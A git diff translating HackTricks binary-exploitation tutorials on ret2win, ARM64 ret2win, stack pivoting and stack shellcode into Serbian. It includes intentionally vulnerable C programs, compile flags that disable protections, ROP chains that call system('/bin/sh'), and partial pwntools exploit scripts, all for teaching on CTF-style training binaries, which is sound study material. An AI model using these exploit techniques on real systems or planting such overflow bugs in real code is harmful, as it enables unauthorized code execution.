+Ova komanda će vam prikazati asembler funkcije `win`, uključujući njenu početnu adresu. 
 
-This command will show you the assembly of the `win` function, including its starting address. 
+Python skripta šalje pažljivo oblikovanu poruku koja, kada je obrađena od strane `vulnerable_function`, preplavljuje bafer i prepisuje adresu povratka na steku sa adresom `win`. Kada `vulnerable_function` vrati, umesto da se vrati na `main` ili izađe, skače na `win`, i poruka se ispisuje.
 
-The Python script sends a carefully crafted message that, when processed by the `vulnerable_function`, overflows the buffer and overwrites the return address on the stack with the address of `win`. When `vulnerable_function` returns, instead of returning to `main` or exiting, it jumps to `win`, and the message is printed.
+## Zaštite
 
-## Protections
+- [**PIE**](../../common-binary-protections-and-bypasses/pie/) **treba da bude onemogućena** kako bi adresa bila pouzdana tokom izvršavanja ili adresa na kojoj će funkcija biti smeštena neće uvek biti ista i biće vam potrebna neka leak da biste saznali gde je funkcija win učitana. U nekim slučajevima, kada funkcija koja uzrokuje prelivanje je `read` ili slična, možete izvršiti **Delimično Prepisivanje** od 1 ili 2 bajta da promenite adresu povratka na funkciju win. Zbog načina na koji ASLR funkcioniše, poslednja tri heksadecimalna nibbla nisu nasumična, tako da postoji **1/16 šanse** (1 nibble) da dobijete ispravnu adresu povratka.
+- [**Stack Canaries**](../../common-binary-protections-and-bypasses/stack-canaries/) takođe treba da budu onemogućene ili kompromitovana EIP adresa povratka nikada neće biti praćena.
 
-- [**PIE**](../../common-binary-protections-and-bypasses/pie/) **should be disabled** for the address to be reliable across executions or the address where the function will be stored won't be always the same and you would need some leak in order to figure out where is the win function loaded. In some cases, when the function that causes the overflow is `read` or similar, you can do a **Partial Overwrite** of 1 or 2 bytes to change the return address to be the win function. Because of how ASLR works, the last three hex nibbles are not randomized, so there is a **1/16 chance** (1 nibble) to get the correct return address.
-- [**Stack Canaries**](../../common-binary-protections-and-bypasses/stack-canaries/) should be also disabled or the compromised EIP return address won't never be followed.
-
-## Other examples & References
+## Ostali primeri & Reference
 
 - [https://ir0nstone.gitbook.io/notes/types/stack/ret2win](https://ir0nstone.gitbook.io/notes/types/stack/ret2win)
 - [https://guyinatuxedo.github.io/04-bof_variable/tamu19_pwn1/index.html](https://guyinatuxedo.github.io/04-bof_variable/tamu19_pwn1/index.html)
-  - 32bit, no ASLR
+- 32bit, bez ASLR
 - [https://guyinatuxedo.github.io/05-bof_callfunction/csaw16_warmup/index.html](https://guyinatuxedo.github.io/05-bof_callfunction/csaw16_warmup/index.html)
-  - 64 bits with ASLR, with a leak of the bin address
+- 64 bita sa ASLR, sa leak-om adrese bin
 - [https://guyinatuxedo.github.io/05-bof_callfunction/csaw18_getit/index.html](https://guyinatuxedo.github.io/05-bof_callfunction/csaw18_getit/index.html)
-  - 64 bits, no ASLR
+- 64 bita, bez ASLR
 - [https://guyinatuxedo.github.io/05-bof_callfunction/tu17_vulnchat/index.html](https://guyinatuxedo.github.io/05-bof_callfunction/tu17_vulnchat/index.html)
-  - 32 bits, no ASLR, double small overflow, first to overflow the stack and enlarge the size of the second overflow
+- 32 bita, bez ASLR, dvostruko malo prelivanje, prvo da preplavi stek i poveća veličinu drugog prelivanja
 - [https://guyinatuxedo.github.io/10-fmt_strings/backdoor17_bbpwn/index.html](https://guyinatuxedo.github.io/10-fmt_strings/backdoor17_bbpwn/index.html)
-  - 32 bit, relro, no canary, nx, no pie, format string to overwrite the address `fflush` with the win function (ret2win)
+- 32 bita, relro, bez kanarija, nx, bez pie, format string za prepisivanje adrese `fflush` sa funkcijom win (ret2win)
 - [https://guyinatuxedo.github.io/15-partial_overwrite/tamu19_pwn2/index.html](https://guyinatuxedo.github.io/15-partial_overwrite/tamu19_pwn2/index.html)
-  - 32 bit, nx, nothing else, partial overwrite of EIP (1Byte) to call the win function
+- 32 bita, nx, ništa drugo, delimično prepisivanje EIP (1Byte) da pozove funkciju win
 - [https://guyinatuxedo.github.io/15-partial_overwrite/tuctf17_vulnchat2/index.html](https://guyinatuxedo.github.io/15-partial_overwrite/tuctf17_vulnchat2/index.html)
-  - 32 bit, nx, nothing else, partial overwrite of EIP (1Byte) to call the win function
+- 32 bita, nx, ništa drugo, delimično prepisivanje EIP (1Byte) da pozove funkciju win
 - [https://guyinatuxedo.github.io/35-integer_exploitation/int_overflow_post/index.html](https://guyinatuxedo.github.io/35-integer_exploitation/int_overflow_post/index.html)
-  - The program is only validating the last byte of a number to check for the size of the input, therefore it's possible to add any zie as long as the last byte is inside the allowed range. Then, the input creates a buffer overflow exploited with a ret2win.
+- Program samo validira poslednji bajt broja da proveri veličinu ulaza, stoga je moguće dodati bilo koju veličinu sve dok je poslednji bajt unutar dozvoljenog opsega. Tada, ulaz stvara prelivanje bafera koje se eksploatiše sa ret2win.
 - [https://7rocky.github.io/en/ctf/other/blackhat-ctf/fno-stack-protector/](https://7rocky.github.io/en/ctf/other/blackhat-ctf/fno-stack-protector/)
-  - 64 bit, relro, no canary, nx, pie. Partial overwrite to call the win function (ret2win)
+- 64 bita, relro, bez kanarija, nx, pie. Delimično prepisivanje da pozove funkciju win (ret2win)
 - [https://8ksec.io/arm64-reversing-and-exploitation-part-3-a-simple-rop-chain/](https://8ksec.io/arm64-reversing-and-exploitation-part-3-a-simple-rop-chain/)
-  - arm64, PIE, it gives a PIE leak the win function is actually 2 functions so ROP gadget that calls 2 functions
+- arm64, PIE, daje PIE leak funkcija win je zapravo 2 funkcije tako da ROP gadget koji poziva 2 funkcije
 - [https://8ksec.io/arm64-reversing-and-exploitation-part-9-exploiting-an-off-by-one-overflow-vulnerability/](https://8ksec.io/arm64-reversing-and-exploitation-part-9-exploiting-an-off-by-one-overflow-vulnerability/)
-  - ARM64, off-by-one to call a win function
+- ARM64, off-by-one da pozove funkciju win
 
-## ARM64 Example
+## ARM64 Primer
 
 {{#ref}}
 ret2win-arm64.md
diff --git a/src/binary-exploitation/stack-overflow/ret2win/ret2win-arm64.md b/src/binary-exploitation/stack-overflow/ret2win/ret2win-arm64.md
index 410cf5cf0..973d35ff0 100644
--- a/src/binary-exploitation/stack-overflow/ret2win/ret2win-arm64.md
+++ b/src/binary-exploitation/stack-overflow/ret2win/ret2win-arm64.md
@@ -2,109 +2,94 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-Find an introduction to arm64 in:
+Pronađite uvod u arm64 u:
 
 {{#ref}}
 ../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md
 {{#endref}}
 
 ## Code 
-
 ```c
 #include 
 #include 
 
 void win() {
-    printf("Congratulations!\n");
+printf("Congratulations!\n");
 }
 
 void vulnerable_function() {
-    char buffer[64];
-    read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability
+char buffer[64];
+read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability
 }
 
 int main() {
-    vulnerable_function();
-    return 0;
+vulnerable_function();
+return 0;
 }
 ```
-
-Compile without pie and canary:
-
+Kompajlirati bez pie i kanarinca:
 ```bash
 clang -o ret2win ret2win.c -fno-stack-protector -Wno-format-security -no-pie
 ```
+## Pronalaženje ofseta
 
-## Finding the offset
+### Opcija obrasca
 
-### Pattern option
-
-This example was created using [**GEF**](https://github.com/bata24/gef):
-
-Stat gdb with gef, create pattern and use it:
+Ovaj primer je napravljen koristeći [**GEF**](https://github.com/bata24/gef):
 
+Pokrenite gdb sa gef, kreirajte obrazac i koristite ga:
 ```bash
 gdb -q ./ret2win
 pattern create 200
 run
 ```
-
 

 
-arm64 will try to return to the address in the register x30 (which was compromised), we can use that to find the pattern offset:
-
+arm64 će pokušati da se vrati na adresu u registru x30 (koji je kompromitovan), možemo to iskoristiti da pronađemo pomeraj obrasca:
 ```bash
 pattern search $x30
 ```
-
 

 
-**The offset is 72 (9x48).**
+**Pomak je 72 (9x48).**
 
-### Stack offset option
-
-Start by getting the stack address where the pc register is stored:
+### Opcija pomaka steka
 
+Počnite tako što ćete dobiti adresu steka gde je sačuvan pc registar:
 ```bash
 gdb -q ./ret2win
 b *vulnerable_function + 0xc
 run
 info frame
 ```
-
 

 
-Now set a breakpoint after the `read()` and continue until the `read()` is executed and set a pattern such as 13371337:
-
+Sada postavite tačku prekida nakon `read()` i nastavite dok se `read()` ne izvrši i postavite obrazac kao što je 13371337:
 ```
 b *vulnerable_function+28
 c
 ```
-
 

 
-Find where this pattern is stored in memory:
+Pronađite gde je ovaj obrazac smešten u memoriji:
 
 

 
-Then: **`0xfffffffff148 - 0xfffffffff100 = 0x48 = 72`**
+Zatim: **`0xfffffffff148 - 0xfffffffff100 = 0x48 = 72`**
 
 

 
-## No PIE
+## Bez PIE
 
-### Regular
-
-Get the address of the **`win`** function:
+### Redovni
 
+Dobijte adresu **`win`** funkcije:
 ```bash
 objdump -d ret2win | grep win
 ret2win:     file format elf64-littleaarch64
 00000000004006c4 :
 ```
-
-Exploit:
-
+Eksploit:
 ```python
 from pwn import *
 
@@ -124,13 +109,11 @@ p.send(payload)
 print(p.recvline())
 p.close()
 ```
-
 

 
 ### Off-by-1
 
-Actually this is going to by more like a off-by-2 in the stored PC in the stack. Instead of overwriting all the return address we are going to overwrite **only the last 2 bytes** with `0x06c4`.
-
+U stvari, ovo će više ličiti na off-by-2 u sačuvanom PC-u u steku. Umesto da prepisujemo celu adresu povratka, prepisujemo **samo poslednja 2 bajta** sa `0x06c4`.
 ```python
 from pwn import *
 
@@ -150,22 +133,20 @@ p.send(payload)
 print(p.recvline())
 p.close()
 ```
-
 

 
-You can find another off-by-one example in ARM64 in [https://8ksec.io/arm64-reversing-and-exploitation-part-9-exploiting-an-off-by-one-overflow-vulnerability/](https://8ksec.io/arm64-reversing-and-exploitation-part-9-exploiting-an-off-by-one-overflow-vulnerability/), which is a real off-by-**one** in a fictitious vulnerability.
+Možete pronaći još jedan primer off-by-one u ARM64 na [https://8ksec.io/arm64-reversing-and-exploitation-part-9-exploiting-an-off-by-one-overflow-vulnerability/](https://8ksec.io/arm64-reversing-and-exploitation-part-9-exploiting-an-off-by-one-overflow-vulnerability/), koji je pravi off-by-**one** u fiktivnoj ranjivosti.
 
-## With PIE
+## Sa PIE
 
 > [!TIP]
-> Compile the binary **without the `-no-pie` argument**
+> Kompajlirajte binarni fajl **bez `-no-pie` argumenta**
 
 ### Off-by-2
 
-Without a leak we don't know the exact address of the winning function but we can know the offset of the function from the binary and knowing that the return address we are overwriting is already pointing to a close address, it's possible to leak the offset to the win function (**0x7d4**) in this case and just use that offset:
+Bez leak-a ne znamo tačnu adresu pobedničke funkcije, ali možemo znati offset funkcije od binarnog fajla i znajući da adresa povratka koju prepisujemo već pokazuje na blisku adresu, moguće je leak-ovati offset do win funkcije (**0x7d4**) u ovom slučaju i jednostavno koristiti taj offset:
 
 

-
 ```python
 from pwn import *
 
@@ -185,5 +166,4 @@ p.send(payload)
 print(p.recvline())
 p.close()
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md b/src/binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md
index a786dea8e..917506ba3 100644
--- a/src/binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md
+++ b/src/binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md
@@ -2,64 +2,61 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Basic Information
+## Osnovne informacije
 
-This technique exploits the ability to manipulate the **Base Pointer (EBP)** to chain the execution of multiple functions through careful use of the EBP register and the **`leave; ret`** instruction sequence.
-
-As a reminder, **`leave`** basically means:
+Ova tehnika koristi sposobnost manipulacije **Base Pointer (EBP)** za povezivanje izvršavanja više funkcija kroz pažljivu upotrebu EBP registra i **`leave; ret`** instrukcijske sekvence.
 
+Kao podsetnik, **`leave`** u suštini znači:
 ```
 mov       ebp, esp
 pop       ebp
 ret
 ```
-
-And as the **EBP is in the stack** before the EIP it's possible to control it controlling the stack.
+I kao što je **EBP u steku** pre EIP-a, moguće je kontrolisati ga kontrolišući stek.
 
 ### EBP2Ret
 
-This technique is particularly useful when you can **alter the EBP register but have no direct way to change the EIP register**. It leverages the behaviour of functions when they finish executing.
+Ova tehnika je posebno korisna kada možete **promeniti EBP registar, ali nemate direktan način da promenite EIP registar**. Ona koristi ponašanje funkcija kada završe izvršavanje.
 
-If, during `fvuln`'s execution, you manage to inject a **fake EBP** in the stack that points to an area in memory where your shellcode's address is located (plus 4 bytes to account for the `pop` operation), you can indirectly control the EIP. As `fvuln` returns, the ESP is set to this crafted location, and the subsequent `pop` operation decreases ESP by 4, **effectively making it point to an address store by the attacker in there.**\
-Note how you **need to know 2 addresses**: The one where ESP is going to go, where you will need to write the address that is pointed by ESP.
+Ako, tokom izvršavanja `fvuln`, uspete da injektujete **lažni EBP** u stek koji pokazuje na oblast u memoriji gde se nalazi adresa vašeg shellcode-a (plus 4 bajta da se uzme u obzir `pop` operacija), možete indirektno kontrolisati EIP. Kada `fvuln` vrati, ESP se postavlja na ovu kreiranu lokaciju, a naredna `pop` operacija smanjuje ESP za 4, **efektivno ga usmeravajući na adresu koju je napadač postavio tamo.**\
+Obratite pažnju da **morate znati 2 adrese**: onu na koju će ESP ići, gde ćete morati da upišete adresu na koju pokazuje ESP.
 
-#### Exploit Construction
+#### Konstrukcija Eksploita
 
-First you need to know an **address where you can write arbitrary data / addresses**. The ESP will point here and **run the first `ret`**.
+Prvo morate znati **adresu na kojoj možete pisati proizvoljne podatke / adrese**. ESP će pokazivati ovde i **izvršiti prvi `ret`**.
 
-Then, you need to know the address used by `ret` that will **execute arbitrary code**. You could use:
+Zatim, morate znati adresu koju koristi `ret` koja će **izvršiti proizvoljni kod**. Možete koristiti:
 
-- A valid [**ONE_GADGET**](https://github.com/david942j/one_gadget) address.
-- The address of **`system()`** followed by **4 junk bytes** and the address of `"/bin/sh"` (x86 bits).
-- The address of a **`jump esp;`** gadget ([**ret2esp**](../rop-return-oriented-programing/ret2esp-ret2reg.md)) followed by the **shellcode** to execute.
-- Some [**ROP**](../rop-return-oriented-programing/) chain
+- Validnu [**ONE_GADGET**](https://github.com/david942j/one_gadget) adresu.
+- Adresu **`system()`** praćenu **4 junk bajta** i adresu `"/bin/sh"` (x86 bitovi).
+- Adresu **`jump esp;`** gadgeta ([**ret2esp**](../rop-return-oriented-programing/ret2esp-ret2reg.md)) praćenu **shellcode-om** koji treba izvršiti.
+- Neki [**ROP**](../rop-return-oriented-programing/) lanac.
 
-Remember than before any of these addresses in the controlled part of the memory, there must be **`4` bytes** because of the **`pop`** part of the `leave` instruction. It would be possible to abuse these 4B to set a **second fake EBP** and continue controlling the execution.
+Zapamtite da pre bilo koje od ovih adresa u kontrolisanom delu memorije, mora biti **`4` bajta** zbog **`pop`** dela `leave` instrukcije. Bilo bi moguće zloupotrebiti ovih 4B da postavite **drugi lažni EBP** i nastavite sa kontrolisanjem izvršavanja.
 
-#### Off-By-One Exploit
+#### Off-By-One Eksploit
 
-There's a specific variant of this technique known as an "Off-By-One Exploit". It's used when you can **only modify the least significant byte of the EBP**. In such a case, the memory location storing the address to jumo to with the **`ret`** must share the first three bytes with the EBP, allowing for a similar manipulation with more constrained conditions.\
-Usually it's modified the byte 0x00t o jump as far as possible.
+Postoji specifična varijanta ove tehnike poznata kao "Off-By-One Eksploit". Koristi se kada možete **samo modifikovati najmanje značajan bajt EBP-a**. U takvom slučaju, memorijska lokacija koja čuva adresu na koju treba skočiti sa **`ret`** mora deliti prva tri bajta sa EBP-om, omogućavajući sličnu manipulaciju sa strožim uslovima.\
+Obično se modifikuje bajt 0x00 da skoči što je dalje moguće.
 
-Also, it's common to use a RET sled in the stack and put the real ROP chain at the end to make it more probably that the new ESP points inside the RET SLED and the final ROP chain is executed.
+Takođe, uobičajeno je koristiti RET sled u steku i staviti pravi ROP lanac na kraj kako bi se povećala verovatnoća da novi ESP pokazuje unutar RET SLED-a i da se konačni ROP lanac izvrši.
 
-### **EBP Chaining**
+### **EBP Lanci**
 
-Therefore, putting a controlled address in the `EBP` entry of the stack and an address to `leave; ret` in `EIP`, it's possible to **move the `ESP` to the controlled `EBP` address from the stack**.
+Dakle, postavljanjem kontrolisane adrese u `EBP` unos steka i adrese za `leave; ret` u `EIP`, moguće je **premestiti `ESP` na kontrolisanu `EBP` adresu iz steka**.
 
-Now, the **`ESP`** is controlled pointing to a desired address and the next instruction to execute is a `RET`. To abuse this, it's possible to place in the controlled ESP place this:
+Sada je **`ESP`** kontrolisan i pokazuje na željenu adresu, a sledeća instrukcija za izvršavanje je `RET`. Da biste to zloupotrebili, moguće je staviti na kontrolisano mesto ESP ovo:
 
-- **`&(next fake EBP)`** -> Load the new EBP because of `pop ebp` from the `leave` instruction
-- **`system()`** -> Called by `ret`
-- **`&(leave;ret)`** -> Called after system ends, it will move ESP to the fake EBP and start agin
-- **`&("/bin/sh")`**-> Param fro `system`
+- **`&(next fake EBP)`** -> Učitaj novi EBP zbog `pop ebp` iz `leave` instrukcije
+- **`system()`** -> Pozvan od strane `ret`
+- **`&(leave;ret)`** -> Pozvan nakon što sistem završi, premestiće ESP na lažni EBP i ponovo početi
+- **`&("/bin/sh")`**-> Parametar za `system`
 
-Basically this way it's possible to chain several fake EBPs to control the flow of the program.
+U suštini, na ovaj način je moguće povezati nekoliko lažnih EBP-a kako bi se kontrolisao tok programa.
 
-This is like a [ret2lib](../rop-return-oriented-programing/ret2lib/), but more complex with no apparent benefit but could be interesting in some edge-cases.
-
-Moreover, here you have an [**example of a challenge**](https://ir0nstone.gitbook.io/notes/types/stack/stack-pivoting/exploitation/leave) that uses this technique with a **stack leak** to call a winning function. This is the final payload from the page:
+Ovo je kao [ret2lib](../rop-return-oriented-programing/ret2lib/), ali složenije bez očigledne koristi, ali bi moglo biti zanimljivo u nekim ivicama.
 
+Štaviše, ovde imate [**primer izazova**](https://ir0nstone.gitbook.io/notes/types/stack/stack-pivoting/exploitation/leave) koji koristi ovu tehniku sa **stack leak** da pozove pobedničku funkciju. Ovo je konačni payload sa stranice:
 ```python
 from pwn import *
 
@@ -75,34 +72,32 @@ POP_RDI = 0x40122b
 POP_RSI_R15 = 0x401229
 
 payload = flat(
-    0x0,               # rbp (could be the address of anoter fake RBP)
-    POP_RDI,
-    0xdeadbeef,
-    POP_RSI_R15,
-    0xdeadc0de,
-    0x0,
-    elf.sym['winner']
+0x0,               # rbp (could be the address of anoter fake RBP)
+POP_RDI,
+0xdeadbeef,
+POP_RSI_R15,
+0xdeadc0de,
+0x0,
+elf.sym['winner']
 )
 
 payload = payload.ljust(96, b'A')     # pad to 96 (just get to RBP)
 
 payload += flat(
-    buffer,         # Load leak address in RBP
-    LEAVE_RET       # Use leave ro move RSP to the user ROP chain and ret to execute it
+buffer,         # Load leak address in RBP
+LEAVE_RET       # Use leave ro move RSP to the user ROP chain and ret to execute it
 )
 
 pause()
 p.sendline(payload)
 print(p.recvline())
 ```
+## EBP možda neće biti korišćen
 
-## EBP might not be used
-
-As [**explained in this post**](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/NOTES.md#off-by-one-1), if a binary is compiled with some optimizations, the **EBP never gets to control ESP**, therefore, any exploit working by controlling EBP sill basically fail because it doesn't have ay real effect.\
-This is because the **prologue and epilogue changes** if the binary is optimized.
-
-- **Not optimized:**
+Kao [**objašnjeno u ovom postu**](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/NOTES.md#off-by-one-1), ako je binarni fajl kompajliran sa nekim optimizacijama, **EBP nikada ne kontroliše ESP**, stoga, bilo koja eksploatacija koja funkcioniše kontrolom EBP će u suštini propasti jer nema stvarni efekat.\
+To je zato što se **prolog i epilog menjaju** ako je binarni fajl optimizovan.
 
+- **Nije optimizovan:**
 ```bash
 push   %ebp         # save ebp
 mov    %esp,%ebp    # set new ebp
@@ -113,9 +108,7 @@ sub    $0x100,%esp  # increase stack size
 leave               # restore ebp (leave == mov %ebp, %esp; pop %ebp)
 ret                 # return
 ```
-
-- **Optimized:**
-
+- **Optimizovano:**
 ```bash
 push   %ebx         # save ebx
 sub    $0x100,%esp  # increase stack size
@@ -126,13 +119,11 @@ add    $0x10c,%esp  # reduce stack size
 pop    %ebx         # restore ebx
 ret                 # return
 ```
-
-## Other ways to control RSP
+## Druge metode za kontrolu RSP
 
 ### **`pop rsp`** gadget
 
-[**In this page**](https://ir0nstone.gitbook.io/notes/types/stack/stack-pivoting/exploitation/pop-rsp) you can find an example using this technique. For this challenge it was needed to call a function with 2 specific arguments, and there was a **`pop rsp` gadget** and there is a **leak from the stack**:
-
+[**Na ovoj stranici**](https://ir0nstone.gitbook.io/notes/types/stack/stack-pivoting/exploitation/pop-rsp) možete pronaći primer korišćenja ove tehnike. Za ovaj izazov bilo je potrebno pozvati funkciju sa 2 specifična argumenta, a postojala je **`pop rsp` gadget** i postoji **leak sa steka**:
 ```python
 # Code from https://ir0nstone.gitbook.io/notes/types/stack/stack-pivoting/exploitation/pop-rsp
 # This version has added comments
@@ -152,15 +143,15 @@ POP_RSI_R15 = 0x401229     # pop RSI and R15
 
 # The payload starts
 payload = flat(
-    0,                 # r13
-    0,                 # r14
-    0,                 # r15
-    POP_RDI,
-    0xdeadbeef,
-    POP_RSI_R15,
-    0xdeadc0de,
-    0x0,               # r15
-    elf.sym['winner']
+0,                 # r13
+0,                 # r14
+0,                 # r15
+POP_RDI,
+0xdeadbeef,
+POP_RSI_R15,
+0xdeadc0de,
+0x0,               # r15
+elf.sym['winner']
 )
 
 payload = payload.ljust(104, b'A')     # pad to 104
@@ -168,66 +159,63 @@ payload = payload.ljust(104, b'A')     # pad to 104
 # Start popping RSP, this moves the stack to the leaked address and
 # continues the ROP chain in the prepared payload
 payload += flat(
-    POP_CHAIN,
-    buffer             # rsp
+POP_CHAIN,
+buffer             # rsp
 )
 
 pause()
 p.sendline(payload)
 print(p.recvline())
 ```
-
 ### xchg \, rsp gadget
-
 ```
 pop                 <=== return pointer
 
 xchg , rsp
 ```
-
 ### jmp esp
 
-Check the ret2esp technique here:
+Proverite ret2esp tehniku ovde:
 
 {{#ref}}
 ../rop-return-oriented-programing/ret2esp-ret2reg.md
 {{#endref}}
 
-## References & Other Examples
+## Reference i Ostali Primeri
 
 - [https://bananamafia.dev/post/binary-rop-stackpivot/](https://bananamafia.dev/post/binary-rop-stackpivot/)
 - [https://ir0nstone.gitbook.io/notes/types/stack/stack-pivoting](https://ir0nstone.gitbook.io/notes/types/stack/stack-pivoting)
 - [https://guyinatuxedo.github.io/17-stack_pivot/dcquals19_speedrun4/index.html](https://guyinatuxedo.github.io/17-stack_pivot/dcquals19_speedrun4/index.html)
-  - 64 bits, off by one exploitation with a rop chain starting with a ret sled
+- 64 bita, off by one eksploatacija sa rop lancem koji počinje sa ret sled
 - [https://guyinatuxedo.github.io/17-stack_pivot/insomnihack18_onewrite/index.html](https://guyinatuxedo.github.io/17-stack_pivot/insomnihack18_onewrite/index.html)
-  - 64 bit, no relro, canary, nx and pie. The program grants a leak for stack or pie and a WWW of a qword. First get the stack leak and use the WWW to go back and get the pie leak. Then use the WWW to create an eternal loop abusing `.fini_array` entries + calling `__libc_csu_fini` ([more info here](../arbitrary-write-2-exec/www2exec-.dtors-and-.fini_array.md)). Abusing this "eternal" write, it's written a ROP chain in the .bss and end up calling it pivoting with RBP.
+- 64 bita, bez relro, kanarinca, nx i pie. Program omogućava leak za stack ili pie i WWW za qword. Prvo dobijte stack leak i koristite WWW da se vratite i dobijete pie leak. Zatim koristite WWW da kreirate večnu petlju zloupotrebljavajući `.fini_array` unose + pozivajući `__libc_csu_fini` ([više informacija ovde](../arbitrary-write-2-exec/www2exec-.dtors-and-.fini_array.md)). Zloupotrebljavajući ovo "večito" pisanje, napisano je ROP lanac u .bss i završava pozivajući ga pivotovanjem sa RBP.
 
 ## ARM64
 
-In ARM64, the **prologue and epilogues** of the functions **don't store and retrieve the SP registry** in the stack. Moreover, the **`RET`** instruction don't return to the address pointed by SP, but **to the address inside `x30`**.
+U ARM64, **prolog i epilog** funkcija **ne čuvaju i ne preuzimaju SP registar** u stacku. Štaviše, **`RET`** instrukcija ne vraća se na adresu koju pokazuje SP, već **na adresu unutar `x30`**.
 
-Therefore, by default, just abusing the epilogue you **won't be able to control the SP registry** by overwriting some data inside the stack. And even if you manage to control the SP you would still need a way to **control the `x30`** register.
+Stoga, po defaultu, samo zloupotrebljavajući epilog **nećete moći da kontrolišete SP registar** prepisivanjem nekih podataka unutar stacka. I čak i ako uspete da kontrolišete SP, i dalje bi vam bila potrebna mogućnost da **kontrolišete `x30`** registar.
 
-- prologue
+- prolog
 
-  ```armasm
-  sub sp, sp, 16
-  stp x29, x30, [sp]      // [sp] = x29; [sp + 8] = x30
-  mov x29, sp             // FP points to frame record
-  ```
+```armasm
+sub sp, sp, 16
+stp x29, x30, [sp]      // [sp] = x29; [sp + 8] = x30
+mov x29, sp             // FP pokazuje na okvir zapisa
+```
 
-- epilogue
+- epilog
 
-  ```armasm
-  ldp x29, x30, [sp]      // x29 = [sp]; x30 = [sp + 8]
-  add sp, sp, 16
-  ret
-  ```
+```armasm
+ldp x29, x30, [sp]      // x29 = [sp]; x30 = [sp + 8]
+add sp, sp, 16
+ret
+```
 
 > [!CAUTION]
-> The way to perform something similar to stack pivoting in ARM64 would be to be able to **control the `SP`** (by controlling some register whose value is passed to `SP` or because for some reason `SP` is taking his address from the stack and we have an overflow) and then **abuse the epilogu**e to load the **`x30`** register from a **controlled `SP`** and **`RET`** to it.
+> Način da se izvede nešto slično pivotovanju stacka u ARM64 bio bi da se može **kontrolisati `SP`** (kontrolisanjem nekog registra čija se vrednost prosleđuje `SP` ili zato što iz nekog razloga `SP` uzima svoju adresu iz stacka i imamo overflow) i zatim **zloupotrebljavati epilog** da učitamo **`x30`** registar iz **kontrolisanog `SP`** i **`RET`** na njega.
 
-Also in the following page you can see the equivalent of **Ret2esp in ARM64**:
+Takođe na sledećoj stranici možete videti ekvivalent **Ret2esp u ARM64**:
 
 {{#ref}}
 ../rop-return-oriented-programing/ret2esp-ret2reg.md
diff --git a/src/binary-exploitation/stack-overflow/stack-shellcode/README.md b/src/binary-exploitation/stack-overflow/stack-shellcode/README.md
index 187c832b7..9caa4cc68 100644
--- a/src/binary-exploitation/stack-overflow/stack-shellcode/README.md
+++ b/src/binary-exploitation/stack-overflow/stack-shellcode/README.md
@@ -2,49 +2,44 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Basic Information
+## Osnovne Informacije
 
-**Stack shellcode** is a technique used in **binary exploitation** where an attacker writes shellcode to a vulnerable program's stack and then modifies the **Instruction Pointer (IP)** or **Extended Instruction Pointer (EIP)** to point to the location of this shellcode, causing it to execute. This is a classic method used to gain unauthorized access or execute arbitrary commands on a target system. Here's a breakdown of the process, including a simple C example and how you might write a corresponding exploit using Python with **pwntools**.
+**Stack shellcode** je tehnika koja se koristi u **binary exploitation** gde napadač piše shellcode na stek ranjivog programa, a zatim menja **Instruction Pointer (IP)** ili **Extended Instruction Pointer (EIP)** da pokazuje na lokaciju ovog shellcode-a, uzrokujući njegovo izvršavanje. Ovo je klasična metoda koja se koristi za sticanje neovlašćenog pristupa ili izvršavanje proizvoljnih komandi na ciljanom sistemu. Evo pregleda procesa, uključujući jednostavan C primer i kako biste mogli napisati odgovarajući exploit koristeći Python sa **pwntools**.
 
-### C Example: A Vulnerable Program
-
-Let's start with a simple example of a vulnerable C program:
+### C Primer: Ranjivi Program
 
+Hajde da počnemo sa jednostavnim primerom ranjivog C programa:
 ```c
 #include 
 #include 
 
 void vulnerable_function() {
-    char buffer[64];
-    gets(buffer); // Unsafe function that does not check for buffer overflow
+char buffer[64];
+gets(buffer); // Unsafe function that does not check for buffer overflow
 }
 
 int main() {
-    vulnerable_function();
-    printf("Returned safely\n");
-    return 0;
+vulnerable_function();
+printf("Returned safely\n");
+return 0;
 }
 ```
+Ovaj program je podložan prelivanju bafera zbog korišćenja `gets()` funkcije.
 
-This program is vulnerable to a buffer overflow due to the use of the `gets()` function.
-
-### Compilation
-
-To compile this program while disabling various protections (to simulate a vulnerable environment), you can use the following command:
+### Kompilacija
 
+Da biste kompajlirali ovaj program dok onemogućavate razne zaštite (da simulirate ranjivo okruženje), možete koristiti sledeću komandu:
 ```sh
 gcc -m32 -fno-stack-protector -z execstack -no-pie -o vulnerable vulnerable.c
 ```
-
-- `-fno-stack-protector`: Disables stack protection.
-- `-z execstack`: Makes the stack executable, which is necessary for executing shellcode stored on the stack.
-- `-no-pie`: Disables Position Independent Executable, making it easier to predict the memory address where our shellcode will be located.
-- `-m32`: Compiles the program as a 32-bit executable, often used for simplicity in exploit development.
+- `-fno-stack-protector`: Onemogućava zaštitu steka.
+- `-z execstack`: Čini stek izvršnim, što je neophodno za izvršavanje shellcode-a smeštenog na steku.
+- `-no-pie`: Onemogućava Position Independent Executable, olakšavajući predviđanje memorijske adrese na kojoj će se nalaziti naš shellcode.
+- `-m32`: Kompajlira program kao 32-bitni izvršni fajl, često korišćen za jednostavnost u razvoju eksploata.
 
 ### Python Exploit using Pwntools
 
-Here's how you could write an exploit in Python using **pwntools** to perform a **ret2shellcode** attack:
-
+Evo kako možete napisati exploit u Python-u koristeći **pwntools** za izvođenje **ret2shellcode** napada:
 ```python
 from pwn import *
 
@@ -71,27 +66,26 @@ payload += p32(0xffffcfb4) # Supossing 0xffffcfb4 will be inside NOP slide
 p.sendline(payload)
 p.interactive()
 ```
+Ovaj skript konstruira payload koji se sastoji od **NOP slide**, **shellcode**, a zatim prepisuje **EIP** sa adresom koja pokazuje na NOP slide, osiguravajući da se shellcode izvrši.
 
